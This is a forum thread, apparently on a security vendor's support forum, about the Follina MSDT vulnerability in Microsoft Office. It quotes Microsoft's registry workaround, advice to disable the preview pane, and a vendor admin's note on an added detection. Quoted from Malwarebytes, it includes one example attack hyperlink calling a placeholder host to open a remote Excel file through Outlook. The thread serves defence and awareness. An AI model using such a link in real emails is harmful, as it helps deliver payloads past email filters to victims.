Jump to content

MS Word Follina Exploit Not Detected


Recommended Posts

Posted (edited)

My advice on this exploit is to do what Microsoft recommends:

Quote

Workarounds

To disable the MSDT URL Protocol

Disabling MSDT URL protocol prevents troubleshooters being launched as links including links throughout the operating system. Troubleshooters can still be accessed using the Get Help application and in system settings as other or additional troubleshooters. Follow these steps to disable:

  1. Run Command Prompt as Administrator.
  2. To back up the registry key, execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt filename
  3. Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”.

How to undo the workaround

  1. Run Command Prompt as Administrator.
  2. To restore the registry key, execute the command “reg import filename” 

https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

Also, you can be infected by this exploit via a .rtf file download by any attempted access of the file. Also, MS Office Protected View protection is N/A in this instance. Therefore, the following must be done:

Quote

Disable preview in Windows Explorer

If you have the preview pane enabled, you can:

  • Open File Explorer.
  • Click on View Tab.
  • Click on Preview Pane to hide it.

 

https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug/

An example of how dangerous this exploit is shown below per the MalwareBytes article:

Quote

Researcher Kevin Beaumont provides the example where an attacker can send an email with this text as a hyperlink:

ms-excel:ofv|u|https://blah.com/poc.xls

And Outlook will allow the user to click the hyperlink and open the Excel document. Because the document isn’t attached to the email, and the URI doesn’t start with http or https, most email gateways are going to let that slide straight through as nothing appears malicious.

 

Edited by itman
Link to comment
Share on other sites

  • Administrators
1 hour ago, itman said:

A detection was added at about 13:00 CEST, ie. will be released with the next update 25364. However, the url with a payload was blocked at about 12:45 CEST so users have been protected since then. We're going to make a minor change shortly which would allow a file like this to be detected earlier, independently of the engine update.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...